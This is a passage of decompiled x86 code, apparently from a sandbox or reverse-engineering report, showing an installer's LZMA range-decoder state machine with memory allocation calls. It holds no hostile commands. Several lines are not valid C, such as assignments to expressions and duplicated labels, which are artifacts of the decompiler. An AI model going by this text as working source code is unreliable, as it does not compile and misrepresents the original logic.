                                                                                                                                                                            						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                                                                            						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                                                                            						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                                                                            						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                                                                                                            						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                                                                                                            						_t539 =  *(_t621 - 4) + 0x664;
                                                                                                                                                                            						 *(_t621 - 0x58) = _t539;
                                                                                                                                                                            						goto L68;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						 *(__ebp - 0x84) = 8;
                                                                                                                                                                            						while(1) {
                                                                                                                                                                            							L132:
                                                                                                                                                                            							 *(_t621 - 0x54) = _t614;
                                                                                                                                                                            							while(1) {
                                                                                                                                                                            								L133:
                                                                                                                                                                            								_t540 =  *_t614;
                                                                                                                                                                            								_t597 = _t540 & 0x0000ffff;
                                                                                                                                                                            								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                                            								if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                                            									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                                            									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                                            									 *(_t621 - 0x40) = 1;
                                                                                                                                                                            									_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                                            									 *_t614 = _t541;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									 *(_t621 - 0x10) = _t573;
                                                                                                                                                                            									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                            									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                                            								}
                                                                                                                                                                            								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                                            									goto L139;
                                                                                                                                                                            								}
                                                                                                                                                                            								L137:
                                                                                                                                                                            								if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                            									 *(_t621 - 0x88) = 5;
                                                                                                                                                                            									L170:
                                                                                                                                                                            									_t576 = 0x22;
                                                                                                                                                                            									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                                                                                                            									_t544 = 0;
                                                                                                                                                                            									L172:
                                                                                                                                                                            									return _t544;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                                                                                                            								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                            								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                            								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                                            								L139:
                                                                                                                                                                            								_t542 =  *(_t621 - 0x84);
                                                                                                                                                                            								while(1) {
                                                                                                                                                                            									 *(_t621 - 0x88) = _t542;
                                                                                                                                                                            									while(1) {
                                                                                                                                                                            										L1:
                                                                                                                                                                            										_t543 =  *(_t621 - 0x88);
                                                                                                                                                                            										if(_t543 > 0x1c) {
                                                                                                                                                                            											break;
                                                                                                                                                                            										}
                                                                                                                                                                            										switch( *((intOrPtr*)(_t543 * 4 +  &M00406BE7))) {
                                                                                                                                                                            											case 0:
                                                                                                                                                                            												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                            												_t543 =  *( *(_t621 - 0x70));
                                                                                                                                                                            												if(_t543 > 0xe1) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t547 = _t543 & 0x000000ff;
                                                                                                                                                                            												_push(0x2d);
                                                                                                                                                                            												asm("cdq");
                                                                                                                                                                            												_pop(_t578);
                                                                                                                                                                            												_push(9);
                                                                                                                                                                            												_pop(_t579);
                                                                                                                                                                            												_t617 = _t547 / _t578;
                                                                                                                                                                            												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                                                                                                            												asm("cdq");
                                                                                                                                                                            												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                                                                                                            												 *(_t621 - 0x3c) = _t612;
                                                                                                                                                                            												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                                                                                                            												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                                                                                                            												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                                                                                                            												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                                                                                                            													L10:
                                                                                                                                                                            													if(_t620 == 0) {
                                                                                                                                                                            														L12:
                                                                                                                                                                            														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                                                                                                            														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                            														goto L15;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														goto L11;
                                                                                                                                                                            													}
                                                                                                                                                                            													do {
                                                                                                                                                                            														L11:
                                                                                                                                                                            														_t620 = _t620 - 1;
                                                                                                                                                                            														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                                                                                                            													} while (_t620 != 0);
                                                                                                                                                                            													goto L12;
                                                                                                                                                                            												}
                                                                                                                                                                            												if( *(_t621 - 4) != 0) {
                                                                                                                                                                            													GlobalFree( *(_t621 - 4)); // executed
                                                                                                                                                                            												}
                                                                                                                                                                            												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                            												 *(_t621 - 4) = _t543;
                                                                                                                                                                            												if(_t543 == 0) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                                                                                                            													goto L10;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 1:
                                                                                                                                                                            												L13:
                                                                                                                                                                            												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                                            												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                            													 *(_t621 - 0x88) = 1;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                            												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                                                                                                            												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                            												_t45 = _t621 - 0x48;
                                                                                                                                                                            												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                                                                                                            												__eflags =  *_t45;
                                                                                                                                                                            												L15:
                                                                                                                                                                            												if( *(_t621 - 0x48) < 4) {
                                                                                                                                                                            													goto L13;
                                                                                                                                                                            												}
                                                                                                                                                                            												_t555 =  *(_t621 - 0x40);
                                                                                                                                                                            												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                                                                                                            													L20:
                                                                                                                                                                            													 *(_t621 - 0x48) = 5;
                                                                                                                                                                            													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                            													goto L23;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(_t621 - 0x74) = _t555;
                                                                                                                                                                            												if( *(_t621 - 8) != 0) {
                                                                                                                                                                            													GlobalFree( *(_t621 - 8)); // executed
                                                                                                                                                                            												}
                                                                                                                                                                            												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                                                                                                            												 *(_t621 - 8) = _t543;
                                                                                                                                                                            												if(_t543 == 0) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L20;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 2:
                                                                                                                                                                            												L24:
                                                                                                                                                                            												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                                                                                                            												 *(_t621 - 0x84) = 6;
                                                                                                                                                                            												 *(_t621 - 0x4c) = _t562;
                                                                                                                                                                            												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                                                                                                            												goto L132;
                                                                                                                                                                            											case 3:
                                                                                                                                                                            												L21:
                                                                                                                                                                            												__eflags =  *(_t621 - 0x6c);
                                                                                                                                                                            												if( *(_t621 - 0x6c) == 0) {
                                                                                                                                                                            													 *(_t621 - 0x88) = 3;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                                                                                                            												_t67 = _t621 - 0x70;
                                                                                                                                                                            												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                                                                                                            												__eflags =  *_t67;
                                                                                                                                                                            												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                                                                                                            												L23:
                                                                                                                                                                            												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                                                                                                            												if( *(_t621 - 0x48) != 0) {
                                                                                                                                                                            													goto L21;
                                                                                                                                                                            												}
                                                                                                                                                                            												goto L24;
                                                                                                                                                                            											case 4:
                                                                                                                                                                            												L133:
                                                                                                                                                                            												_t540 =  *_t614;
                                                                                                                                                                            												_t597 = _t540 & 0x0000ffff;
                                                                                                                                                                            												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                                                                                                            												if( *(_t621 - 0xc) >= _t573) {
                                                                                                                                                                            													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                                                                                                            													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                                                                                                            													 *(_t621 - 0x40) = 1;
                                                                                                                                                                            													_t541 = _t540 - (_t540 >> 5);
                                                                                                                                                                            													 *_t614 = _t541;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(_t621 - 0x10) = _t573;
                                                                                                                                                                            													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                                                                                                            													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                                                                                                            												}
                                                                                                                                                                            												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                                                                                                            													goto L139;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 5:
                                                                                                                                                                            												goto L137;
                                                                                                                                                                            											case 6:
                                                                                                                                                                            												__edx = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            													 *(__ebp - 0x34) = 1;
                                                                                                                                                                            													 *(__ebp - 0x84) = 7;
                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            													L132:
                                                                                                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                            													goto L133;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                                            												__esi =  *(__ebp - 0x60);
                                                                                                                                                                            												__cl = 8;
                                                                                                                                                                            												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                                                                            												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                                            												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x3c);
                                                                                                                                                                            												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                                            												__ecx =  *(__ebp - 4);
                                                                                                                                                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                                                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                                            												if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                                                                            													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                                            														_t98 = __ebp - 0x38;
                                                                                                                                                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                                                                            														__eflags =  *_t98;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                                            													}
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x38) = 0;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                                                                            												if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													__ebx = 1;
                                                                                                                                                                            													goto L61;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													__eax =  *(__ebp - 0x14);
                                                                                                                                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                            													}
                                                                                                                                                                            													__ecx =  *(__ebp - 8);
                                                                                                                                                                            													__ebx = 0;
                                                                                                                                                                            													__ebx = 1;
                                                                                                                                                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                                            													goto L41;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 7:
                                                                                                                                                                            												goto L0;
                                                                                                                                                                            											case 8:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            													 *(__ebp - 0x84) = 0xa;
                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													__eax =  *(__ebp - 0x38);
                                                                                                                                                                            													__ecx =  *(__ebp - 4);
                                                                                                                                                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                                            													 *(__ebp - 0x84) = 9;
                                                                                                                                                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                                            												}
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L132:
                                                                                                                                                                            													 *(_t621 - 0x54) = _t614;
                                                                                                                                                                            													goto L133;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 9:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													goto L89;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x60);
                                                                                                                                                                            												if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                            													goto L171;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax = 0;
                                                                                                                                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                            												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                            												__eflags = _t258;
                                                                                                                                                                            												0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                            												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                            												goto L75;
                                                                                                                                                                            											case 0xa:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__eax =  *(__ebp - 4);
                                                                                                                                                                            													__ecx =  *(__ebp - 0x38);
                                                                                                                                                                            													 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                            													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                            													while(1) {
                                                                                                                                                                            														L132:
                                                                                                                                                                            														 *(_t621 - 0x54) = _t614;
                                                                                                                                                                            														goto L133;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												__eax =  *(__ebp - 0x28);
                                                                                                                                                                            												goto L88;
                                                                                                                                                                            											case 0xb:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                            													__ecx =  *(__ebp - 0x24);
                                                                                                                                                                            													__eax =  *(__ebp - 0x20);
                                                                                                                                                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                            												} else {
                                                                                                                                                                            													__eax =  *(__ebp - 0x24);
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x28);
                                                                                                                                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                            												L88:
                                                                                                                                                                            												__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                            												 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                            												L89:
                                                                                                                                                                            												__eax =  *(__ebp - 4);
                                                                                                                                                                            												 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                            												__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                            												goto L68;
                                                                                                                                                                            											case 0xc:
                                                                                                                                                                            												L99:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t334 = __ebp - 0x70;
                                                                                                                                                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t334;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												__eax =  *(__ebp - 0x2c);
                                                                                                                                                                            												goto L101;
                                                                                                                                                                            											case 0xd:
                                                                                                                                                                            												L37:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0xd;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t122 = __ebp - 0x70;
                                                                                                                                                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t122;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												L39:
                                                                                                                                                                            												__eax =  *(__ebp - 0x40);
                                                                                                                                                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                                            													goto L48;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags = __ebx - 0x100;
                                                                                                                                                                            												if(__ebx >= 0x100) {
                                                                                                                                                                            													goto L54;
                                                                                                                                                                            												}
                                                                                                                                                                            												L41:
                                                                                                                                                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                                            												__ecx =  *(__ebp - 0x58);
                                                                                                                                                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                                            												 *(__ebp - 0x48) = __eax;
                                                                                                                                                                            												__eax = __eax + 1;
                                                                                                                                                                            												__eax = __eax << 8;
                                                                                                                                                                            												__eax = __eax + __ebx;
                                                                                                                                                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            												__ax =  *__esi;
                                                                                                                                                                            												 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            												__edx = __ax & 0x0000ffff;
                                                                                                                                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													__cx = __ax;
                                                                                                                                                                            													 *(__ebp - 0x40) = 1;
                                                                                                                                                                            													__cx = __ax >> 5;
                                                                                                                                                                            													__eflags = __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx + 1;
                                                                                                                                                                            													 *__esi = __ax;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                                            													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            													0x800 = 0x800 - __edx;
                                                                                                                                                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                                            													__ebx = __ebx + __ebx;
                                                                                                                                                                            													 *__esi = __cx;
                                                                                                                                                                            												}
                                                                                                                                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            												 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            													goto L39;
                                                                                                                                                                            												} else {
                                                                                                                                                                            													goto L37;
                                                                                                                                                                            												}
                                                                                                                                                                            											case 0xe:
                                                                                                                                                                            												L46:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0xe;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t156 = __ebp - 0x70;
                                                                                                                                                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t156;
                                                                                                                                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												while(1) {
                                                                                                                                                                            													L48:
                                                                                                                                                                            													__eflags = __ebx - 0x100;
                                                                                                                                                                            													if(__ebx >= 0x100) {
                                                                                                                                                                            														break;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eax =  *(__ebp - 0x58);
                                                                                                                                                                            													__edx = __ebx + __ebx;
                                                                                                                                                                            													__ecx =  *(__ebp - 0x10);
                                                                                                                                                                            													__esi = __edx + __eax;
                                                                                                                                                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                            													__ax =  *__esi;
                                                                                                                                                                            													 *(__ebp - 0x54) = __esi;
                                                                                                                                                                            													__edi = __ax & 0x0000ffff;
                                                                                                                                                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                            														__cx = __ax;
                                                                                                                                                                            														_t170 = __edx + 1; // 0x1
                                                                                                                                                                            														__ebx = _t170;
                                                                                                                                                                            														__cx = __ax >> 5;
                                                                                                                                                                            														__eflags = __eax;
                                                                                                                                                                            														 *__esi = __ax;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                            														0x800 = 0x800 - __edi;
                                                                                                                                                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                            														__ebx = __ebx + __ebx;
                                                                                                                                                                            														 *__esi = __cx;
                                                                                                                                                                            													}
                                                                                                                                                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                            													 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                            														continue;
                                                                                                                                                                            													} else {
                                                                                                                                                                            														goto L46;
                                                                                                                                                                            													}
                                                                                                                                                                            												}
                                                                                                                                                                            												L54:
                                                                                                                                                                            												_t173 = __ebp - 0x34;
                                                                                                                                                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                                            												__eflags =  *_t173;
                                                                                                                                                                            												goto L55;
                                                                                                                                                                            											case 0xf:
                                                                                                                                                                            												L58:
                                                                                                                                                                            												__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                            												if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                            													 *(__ebp - 0x88) = 0xf;
                                                                                                                                                                            													goto L170;
                                                                                                                                                                            												}
                                                                                                                                                                            												__ecx =  *(__ebp - 0x70);
                                                                                                                                                                            												__eax =  *(__ebp - 0xc);
                                                                                                                                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                            												_t203 = __ebp - 0x70;
                                                                                                                                                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                            												__eflags =  *_t203;
